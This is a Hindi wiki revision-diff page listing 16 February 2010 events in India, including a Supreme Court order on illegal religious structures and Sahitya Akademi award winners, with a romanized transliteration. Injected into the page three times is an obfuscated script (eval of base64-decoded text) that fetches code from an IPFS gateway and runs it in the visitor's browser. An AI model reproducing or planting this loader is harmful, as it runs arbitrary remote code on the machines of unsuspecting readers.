Difference between revisions of "16 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "२" to "2")
Line 7: Line 7:
 
** सर्वोच्च न्यायालय की न्यायाधीश दलवीर भंडारी और न्यायाधीश केएस [[राधाकृष्णन]] की खंडपीठ ने सभी राज्यों व केंद्र शासित प्रदेशों को यह सुनिश्चित करने के निर्देश दिए कि सार्वजनिक स्थानों पर किसी भी धार्मिक स्थल का अवैध रूप से निर्माण नहीं हो। कोर्ट ने बिना अनुमति के बन चुके धार्मिक स्थलों के बारे में राज्य सरकारों को 8 सप्ताह के भीतर एक विस्तृत नीति तैयार करने को भी कहा।
 
** सर्वोच्च न्यायालय की न्यायाधीश दलवीर भंडारी और न्यायाधीश केएस [[राधाकृष्णन]] की खंडपीठ ने सभी राज्यों व केंद्र शासित प्रदेशों को यह सुनिश्चित करने के निर्देश दिए कि सार्वजनिक स्थानों पर किसी भी धार्मिक स्थल का अवैध रूप से निर्माण नहीं हो। कोर्ट ने बिना अनुमति के बन चुके धार्मिक स्थलों के बारे में राज्य सरकारों को 8 सप्ताह के भीतर एक विस्तृत नीति तैयार करने को भी कहा।
 
** [[भारत]] के मानव एवं संसाधन विकास मंत्री कपिल सिब्बल ने इंजीनियरिंग, मेडिकल और कॉमर्स कोर्स में दाखिला लेने के लिए 2013 से संयुक्त प्रवेश परिक्षा लेने की घोषणा की।  
 
** [[भारत]] के मानव एवं संसाधन विकास मंत्री कपिल सिब्बल ने इंजीनियरिंग, मेडिकल और कॉमर्स कोर्स में दाखिला लेने के लिए 2013 से संयुक्त प्रवेश परिक्षा लेने की घोषणा की।  
** [[हिन्दी]] के प्रसिद्ध कवि कैलाश वाजपेयी, मैथिली के दिवंगत कथाकार मनमोहन झा तथा [[अंग्रेजी भाषा|अंग्रेजी]] के लेखक चतुर्वेदी बद्रीनाथ समेत २३ लोगों को वर्ष २००९ के साहित्य अकादमी पुरस्कार से सम्मानित किया गया। [[गुजराती भाषा|गुजराती]] के लेखक शिरीष जे. पंचाल ने यह पुरस्कार लेने से मना कर दिया। राज्यसभा सांसद एवं प्रसिद्ध हिन्दी अनुवादक वाई लक्ष्मी प्रसाद को तेलुगू साहित्य के लिये यह पुरस्कार दिया गया।  
+
** [[हिन्दी]] के प्रसिद्ध कवि कैलाश वाजपेयी, मैथिली के दिवंगत कथाकार मनमोहन झा तथा [[अंग्रेजी भाषा|अंग्रेजी]] के लेखक चतुर्वेदी बद्रीनाथ समेत 2३ लोगों को वर्ष 2००९ के साहित्य अकादमी पुरस्कार से सम्मानित किया गया। [[गुजराती भाषा|गुजराती]] के लेखक शिरीष जे. पंचाल ने यह पुरस्कार लेने से मना कर दिया। राज्यसभा सांसद एवं प्रसिद्ध हिन्दी अनुवादक वाई लक्ष्मी प्रसाद को तेलुगू साहित्य के लिये यह पुरस्कार दिया गया।  
  
 
** शास्त्रीय गायक पंडित जसराज, वरिष्ठ फिल्म अभिनेता डा श्रीराम लागू और नृत्यांगना यामिनी कृष्णमूर्ति तथा कर्नाटक संगीत के तीन प्रसिद्ध व्यक्तियों कुल छः व्यक्तियों को उनके संगीत नाटक और नृत्य में योगदान के लिए प्रतिष्ठित संगीत नाटक अकादमी फैलो (अकादमी रत्न) प्रदान करने की घोषणा की गई।
 
** शास्त्रीय गायक पंडित जसराज, वरिष्ठ फिल्म अभिनेता डा श्रीराम लागू और नृत्यांगना यामिनी कृष्णमूर्ति तथा कर्नाटक संगीत के तीन प्रसिद्ध व्यक्तियों कुल छः व्यक्तियों को उनके संगीत नाटक और नृत्य में योगदान के लिए प्रतिष्ठित संगीत नाटक अकादमी फैलो (अकादमी रत्न) प्रदान करने की घोषणा की गई।

Revision as of 07:12, 29 June 2010

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 16 faravari varsh ka 47 vaan din hai. sal me abhi aur 318 din shesh haian. (lip varsh mean 319 din)

16 faravari ki mahattvapoorn ghatanaean

  • 2010-
    • sarvochch nyayalay ki nyayadhish dalavir bhandari aur nyayadhish kees radhakrishnan ki khandapith ne sabhi rajyoan v keandr shasit pradeshoan ko yah sunishchit karane ke nirdesh die ki sarvajanik sthanoan par kisi bhi dharmik sthal ka avaidh roop se nirman nahian ho. kort ne bina anumati ke ban chuke dharmik sthaloan ke bare mean rajy sarakaroan ko 8 saptah ke bhitar ek vistrit niti taiyar karane ko bhi kaha.
    • bharat ke manav evan sansadhan vikas mantri kapil sibbal ne ianjiniyariang, medikal aur k aaumars kors mean dakhila lene ke lie 2013 se sanyukt pravesh pariksha lene ki ghoshana ki.
    • hindi ke prasiddh kavi kailash vajapeyi, maithili ke divangat kathakar manamohan jha tatha aangreji ke lekhak chaturvedi badrinath samet 23 logoan ko varsh 2009 ke sahity akadami puraskar se sammanit kiya gaya. gujarati ke lekhak shirish je. panchal ne yah puraskar lene se mana kar diya. rajyasabha saansad evan prasiddh hindi anuvadak vaee lakshmi prasad ko telugoo sahity ke liye yah puraskar diya gaya.
    • shastriy gayak pandit jasaraj, varishth philm abhineta da shriram lagoo aur nrityaangana yamini krishnamoorti tatha karnatak sangit ke tin prasiddh vyaktiyoan kul chhah vyaktiyoan ko unake sangit natak aur nrity mean yogadan ke lie pratishthit sangit natak akadami phailo (akadami ratn) pradan karane ki ghoshana ki gee.

16 faravari ko janme vyakti

16 faravari ko hue nidhan

16 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>